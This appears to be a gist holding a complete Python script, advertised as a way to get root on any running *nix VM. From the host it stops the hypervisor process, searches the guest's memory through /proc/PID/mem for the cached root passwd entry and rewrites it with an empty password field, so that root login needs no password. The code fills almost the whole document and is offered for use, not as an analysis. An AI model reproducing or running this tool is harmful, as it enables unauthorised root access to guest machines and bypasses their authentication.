Get root on any running *nix VM by patching its memory from the host (root privileges on the host are required).
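#!/usr/bin/python3
"""Patch the in-memory /etc/passwd of a running *nix VM from the host.

Usage: python3 <script> PID        (root privileges required on the host)

The guest's RAM lives inside the hypervisor process, so a host-side write to
/proc/PID/mem that rewrites the cached ``root:x:0:0:root`` passwd entry as
``root::00:0:root`` (same length, empty password field) lets you log in as
root without a password.  The target is SIGSTOPped while it is scanned and
SIGCONTed afterwards, even if the scan fails part-way.

Caveats:
  * Needs ptrace-level access to the target (root / CAP_SYS_PTRACE); a
    hardened Yama ptrace_scope setting may still refuse it -- verify on the
    host.
  * Every mapping except the skip list is scanned, including the hypervisor's
    own memory, and every match in a window is rewritten.
  * Only memory is changed; nothing on the guest's disk is touched, so the
    original entry returns once the guest re-reads the file from disk.
  * If the target was already stopped before this ran, the final SIGCONT
    resumes it.
"""
import sys
import os
import signal

PATTERN = b"root:x:0:0:root"
REPLACE = b"root::00:0:root"
# Scan window size.  Each window is extended by len(PATTERN) - 1 bytes so a
# match straddling two windows is still found; 1 MiB keeps memory use small
# even when one mapping is the whole of guest RAM.
CHUNK = 1 << 20
# Pseudo-mappings not worth scanning ([vsyscall] also sits above the largest
# offset os.pread() accepts).
SKIP = {"[vvar]", "[vdso]", "[stack]", "[vsyscall]"}


def parse_maps(lines, skip=SKIP):
    """Yield ``(start, end, line)`` for each /proc/PID/maps entry to scan.

    ``lines`` is an iterable of raw maps lines.  Blank lines and entries whose
    last field (path or pseudo-name) is in ``skip`` are dropped.  ``start``
    and ``end`` are the mapping's address range as ints; ``line`` is the
    stripped original text, kept for reporting.
    """
    for raw in lines:
        line = raw.strip()
        fields = line.split()
        if not fields or fields[-1] in skip:
            continue
        lo, hi = fields[0].split("-")
        yield int(lo, 16), int(hi, 16), line


def patch_region(fd, start, end, pattern=PATTERN, replace=REPLACE, chunk=CHUNK):
    """Rewrite every occurrence of ``pattern`` in ``[start, end)`` of ``fd``.

    ``fd`` is an ``os.open()`` descriptor on /proc/PID/mem (or any file that
    supports positional I/O).  The range is read with ``os.pread`` in windows
    of ``chunk`` bytes plus a ``len(pattern) - 1`` byte overlap, so a match
    that crosses a window boundary is still found; a window that matched is
    written back with ``os.pwrite`` at the same offset.  Positional I/O
    avoids the stale file position that seek()/read() on a buffered handle
    is left with after a failed read.

    Windows that cannot be read or written (unmapped pages give EIO; an
    address beyond the pread offset range raises OverflowError) are skipped,
    best-effort.

    Returns the number of windows rewritten in full.
    Raises ValueError when ``replace`` is not the same length as ``pattern``
    -- a different length would shift every byte after the match -- or when
    ``pattern`` is empty or ``chunk`` is not positive.
    """
    if len(pattern) != len(replace):
        raise ValueError("replacement must be the same length as the pattern")
    if not pattern:
        raise ValueError("pattern must not be empty")
    if chunk <= 0:
        raise ValueError("chunk must be positive")
    overlap = len(pattern) - 1
    patched = 0
    for offset in range(start, end, chunk):
        size = min(chunk + overlap, end - offset)
        try:
            window = os.pread(fd, size, offset)
        except (OSError, OverflowError):
            continue
        if pattern not in window:
            continue
        data = window.replace(pattern, replace)
        try:
            if os.pwrite(fd, data, offset) == len(data):
                patched += 1
        except OSError:
            pass
    return patched


def main(argv=None):
    """Stop the process, patch its memory, resume it.

    ``argv`` defaults to ``sys.argv``.  Returns an exit status: 0 on
    completion (whether or not anything matched), 1 when the target cannot
    be signalled or its /proc files cannot be opened, 2 on a usage error.
    The target is SIGCONTed in a ``finally`` so a failure mid-scan never
    leaves it stopped.
    """
    argv = sys.argv if argv is None else argv
    try:
        pid = int(argv[1]) if len(argv) == 2 else 0
    except ValueError:
        pid = 0
    # A non-positive PID would signal a process group (0 = our own, which
    # would SIGSTOP this script as well), so insist on a positive integer.
    if pid <= 0:
        print("USAGE: python3 {} PID".format(argv[0]))
        print("(root privs required)")
        return 2
    try:
        os.kill(pid, signal.SIGSTOP)
    except OSError as exc:
        print("cannot stop pid {}: {}".format(pid, exc))
        return 1
    try:
        with open("/proc/{}/maps".format(pid)) as maps:
            regions = list(parse_maps(maps))
        # O_RDWR rather than "wb+": no O_CREAT/O_TRUNC on the proc file, and
        # the descriptor is closed on every path.
        fd = os.open("/proc/{}/mem".format(pid), os.O_RDWR)
        try:
            for start, end, line in regions:
                if patch_region(fd, start, end):
                    print(line)
                    print("w00t")
                    print("w00tw00t")
        finally:
            os.close(fd)
    except OSError as exc:
        print("cannot access memory of pid {}: {}".format(pid, exc))
        return 1
    finally:
        os.kill(pid, signal.SIGCONT)
    return 0


if __name__ == "__main__":
    sys.exit(main())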
wish you can react to a gist..

👍
